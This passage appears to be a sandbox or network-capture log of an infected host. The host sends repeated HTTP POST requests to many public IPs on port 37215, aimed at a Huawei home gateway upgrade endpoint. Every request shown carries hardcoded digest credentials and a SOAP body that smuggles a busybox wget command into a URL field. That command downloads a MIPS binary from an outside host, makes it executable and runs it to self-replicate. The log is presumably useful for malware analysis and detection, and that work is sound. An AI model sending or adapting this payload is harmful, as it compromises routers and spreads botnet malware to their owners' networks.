                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          301192.168.2.154090041.152.252.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.539856911 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          302192.168.2.1554432157.150.96.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.539895058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          303192.168.2.1556810197.237.152.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.539982080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          304192.168.2.154980041.163.189.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.540066004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          305192.168.2.155400841.108.82.6037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.540086031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          306192.168.2.1551524140.81.216.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.540106058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          307192.168.2.1552960197.213.219.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.540184021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          308192.168.2.1534808160.5.162.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.540213108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          309192.168.2.1552636157.83.82.24837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.540235996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          310192.168.2.153855641.70.47.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.541429043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
